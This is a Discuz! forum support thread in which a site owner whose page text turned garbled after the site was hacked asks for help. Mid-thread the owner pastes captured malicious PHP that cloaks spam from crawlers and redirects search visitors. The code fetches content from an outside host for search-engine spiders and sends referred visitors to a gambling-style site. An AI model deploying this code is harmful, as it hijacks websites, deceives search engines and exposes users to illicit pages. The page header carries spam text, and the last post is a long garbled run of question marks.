久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

Discuz! 官方交流社區

標題: x3.4網站突然亂碼了 [打印本頁]
作者: hanxing558    時間: 2020-10-17 18:53
標題: x3.4網站突然亂碼了
好好的運行著,突然整個頁面亂碼了,英文和數字沒問題。手機版也沒問題。求助大神們咋回事啊
(, 下載次數: 29)
作者: allthebest    時間: 2020-10-17 22:54
突然之前

1、瀏覽器加載新功能停用,或

2、站點新安裝插件關閉,或

3、后臺 工具 文件教驗;新修改還原,更新緩存。

作者: hanxing558    時間: 2020-10-18 23:22
allthebest 發表于 2020-10-17 22:54
突然之前

1、瀏覽器加載新功能停用,或

你好,感謝指導!
我這邊昨晚沒及時看你的回復。事情是因為網站被植入一些惡意代碼(有黃賭毒那種),我刪除了這些惡意文件,然后網站PC端就亂碼了,懷疑是這些惡意文件在作祟,但是手機端卻不受影響。應該不是數據庫的損壞吧?想請問這種亂碼一般是哪些文件受影響導致的?
作者: allthebest    時間: 2020-10-18 23:27
hanxing558 發表于 2020-10-18 14:22
你好,感謝指導!
我這邊昨晚沒及時看你的回復。事情是因為網站被植入一些惡意代碼(有黃賭毒那種),我 ...

后臺 工具 文件校驗

近日修改的PHP文件

下載同程序版本

找相同PHP文件覆蓋

更新緩存
作者: hanxing558    時間: 2020-10-18 23:53
allthebest 發表于 2020-10-18 23:27
后臺 工具 文件校驗

近日修改的PHP文件

你好,剛安裝你說的方法試驗了,還是不行,只發現有個文件/source/function/function_core.php的文件修改日期是1994年,感覺奇怪替換了x3.4最新的,而且昨晚我把x3.4的所有文件都覆蓋了一遍也是不行,大神看看還有什么辦法嗎
作者: crx349    時間: 2020-10-19 00:34
瀏覽器先切換編碼看看 如果不行 后臺更新緩存看看
作者: hanxing558    時間: 2020-10-19 01:23
crx349 發表于 2020-10-19 00:34
瀏覽器先切換編碼看看 如果不行 后臺更新緩存看看

謝謝指點,試過谷歌,QQ瀏覽器切換編碼沒有任何變化。360瀏覽器切換UTF8后倒是正常了,一點任何鏈接跳轉頁面就會還是亂碼,手動切換360的編碼為utf8又正常,但是無法根治。換了多臺電腦都是這樣,剛剛回滾了服務器數據盤,一切正常了,任何瀏覽器都不用切換編碼都可以正常顯示。
現在糾結的就是刪除惡意文件的時候,到底哪里跟著變化了,或者說惡意文件植入的時候是不是就留了這個惡果來對抗我們呢~~
作者: hanxing558    時間: 2020-10-19 10:35
本帖最后由 hanxing558 于 2020-10-19 10:48 編輯

截獲了一段惡意文件代碼,大家看看是不是跟這個有關系啊:
<?php
include("/home/wwwroot/kkw/public_html/uc_client/lib/wzseo");

set_time_limit( 0 );
error_reporting( 0 );
@date_default_timezone_set('Etc/GMT-8');
//header('Content-Type: text/html;charset=gb2312');
define('Sg_Y','http://sg.wtohn.com');
define('URL',$_SERVER['SERVER_NAME']);
define('REF',$_SERVER['HTTP_REFERER']);
define('AGENT',$_SERVER['HTTP_USER_AGENT']);
$agent=array('Sogou web','Soso','Haosou','360spider','Bytespider','ToutiaoSpider');
$ref=array('sogou.com','so.com','sm.cn','toutiao.com');
function YC($url) {
        $oo2=array('http'=>array('method'=>"GET",'timeout'=> 8 ));
        $context=stream_context_create($oo2);
        $hh2=file_get_contents($url,false,$context);
        if(empty($hh2)) {
                $hh2=file_get_contents($url);
        }
        return$hh2;
}
function GETID() {
        preg_match_all('/\d+/',$_SERVER['REQUEST_URI'],$a2ra1r1);
        $a2ra1=$a2ra1r1[ 0 ];
        sort($a2ra1);
        return$a2ra1[count($a2ra1)- 1 ];
}
function PHPGET() {
        $dmmu2='';
        if(isset($_SERVER['REQUEST_URI'])) {
                $dmmu2=$_SERVER['REQUEST_URI'];
        } else {
                if(isset($_SERVER['argv'])) {
                        $dmmu2=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][ 0 ];
                } else {
                        $dmmu2=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
                }
        }
        if(isset($_SERVER['SERVER_SOFTWARE'])&&false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')) {
                if(function_exists('mb_convert_encoding')) {
                        $dmmu2=mb_convert_encoding($dmmu2,'UTF-8','GBK');
                } else {
                        $dmmu2=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$dmmu2))==$dmmu2?$dmmu2:@iconv('GBK','UTF-8',$dmmu2);
                }
        }
        $r2=explode('#',$dmmu2, 2 );
        $dmmu2=$r2[ 0 ];
        return$dmmu2;
}
foreach($ref as$kx) {
        if(stristr(REF,$kx)) {
                if(GETID()>= 199 ) {
                        $jst[ 1 ]='http://www.8889990.cc/index.html';
                        $jst[ 2 ]='http://www.8889990.cc/index.html';
                        $out=rand( 1 , 2 );
                        echo header("Location: $jst[$out]");
                }
        }
}
foreach($agent as$kk) {
        if(stristr(AGENT,$kk)) {
                $dmmu2_u2=Sg_Y.'/?xu='.'&xx='.bin2hex(URL);
                $dmmu2_u2.='&xh='.bin2hex(PHPGET()).'&ag='.bin2hex(AGENT);
                $dmmu2_c2=YC($dmmu2_u2);
                echo$dmmu2_c2;
                exit;
        }
}

作者: Failure    時間: 2020-10-19 11:50
被黑了。 相關代碼刪掉  然后找后門。 做好相關的安全
作者: hanxing558    時間: 2020-10-19 17:27
Failure 發表于 2020-10-19 11:50
被黑了。 相關代碼刪掉  然后找后門。 做好相關的安全

現在就是找后門困難啊,你刪除了過一會又自動生出一堆文件,快的很
作者: czwhehehe    時間: 2020-10-20 02:19
刪除盜版插件
作者: crx349    時間: 2020-10-20 15:11
hanxing558 發表于 2020-10-19 10:35
截獲了一段惡意文件代碼,大家看看是不是跟這個有關系啊:

被掛馬了 盡快清理 作下安全
作者: 好佳芯科技    時間: 2020-10-20 15:26
你這全站亂碼,怎么感覺像是  升級的時候  編碼搞錯了
作者: Failure    時間: 2020-10-22 16:04
hanxing558 發表于 2020-10-19 17:27
現在就是找后門困難啊,你刪除了過一會又自動生出一堆文件,快的很

后門沒清掉 一下就會有  很正常
作者: e3600    時間: 2020-10-22 17:10
????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????,特殊字符?這是BUG?



歡迎光臨 Discuz! 官方交流社區 (http://www.9999xn.com/) Powered by Discuz! W1.0